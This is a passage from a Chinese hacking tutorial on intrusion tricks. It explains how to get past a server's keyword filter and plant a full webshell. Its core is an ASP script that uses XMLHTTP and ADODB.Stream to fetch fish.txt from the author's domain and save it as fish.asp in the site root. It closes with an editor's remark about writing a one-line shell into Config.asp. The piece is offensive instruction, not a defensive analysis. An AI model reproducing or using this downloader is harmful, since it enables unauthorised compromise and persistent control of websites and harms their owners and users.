几个用过的经典入侵技巧整理

三、突破一流信息监控系统实现文件“上传”

相信很多朋友可能遇到过这样一个问题：在得到一个小马以后传大马的时候服务器却提示错误：很抱歉，由于您提交的内容中或访问的内容中含有系统不允许的关键词，本次操作无效，系统已记录您的IP及您提交的所有数据。请注意，不要提交任何违反国家规定的内容！本次拦截的相关信息为：98424b88afb8，如图7。

图7

本来以为换个大马就可以了，但是我换了N个马都是不行。我想可能是禁止提交了，但是随便提交几个字都是OK的，原来是因为它设置了限制提交字符，只要我们的大马里包含特殊字符就会被拒绝提交，不过我们还是有办法突破他的。

这个就好比我们上传EXE文件的时候，网站禁止了上传，但是我们可以采用外部下载的方式来把目标文件下载到本地服务器中。比如VBS？嘿嘿 好了，这个方法就是，只要服务器没有禁用XML和数据流组件，我们可以往服务器中提交以下ASP脚本文件，代码如下：

★
<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",http://www.hack521.cn/fish.txt,False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("fish.asp"),2
set sGet = nothing
set sPOST = nothing
%>
★

利用服务器的XML和数据流组件，从我的blog的fish.txt的内容下载到目标站点根目录并保存为fish.asp。fish.txt中的内容当然就是被拦截的内容了，也就是我们的大马。之后访问这个提交的ASP文件，会出现一片空白，然后我们再访问这个fish.asp文件，则想要上传的内容已经被保存成功！如图8。

图8


怎么样？亲爱的读者？你学会了没有？是不是脑子里又多了一条新思路？这期我主要以三个实例来讲解一下一些大家都知道但是都不常用的方法。很多朋友问过我，为什么我写的文章里所用的方法家都知道，为什么就想不到呢？还是那句话，思路要清晰，渗透是一个细致活，不急不躁方能心平。我的ID是CNSST或者加我 QQ也可以：459014 ，下期见！

编辑点评：MSSQL是个强大的数据库，能灵活运用其提供给我们的扩展，就不是一般的高手了；关于配置文件写马，为了写马后还能让网站运行正常，写进 Config.asp里的就要是容错的一句话了，比如

上一页  [1] [2] [3]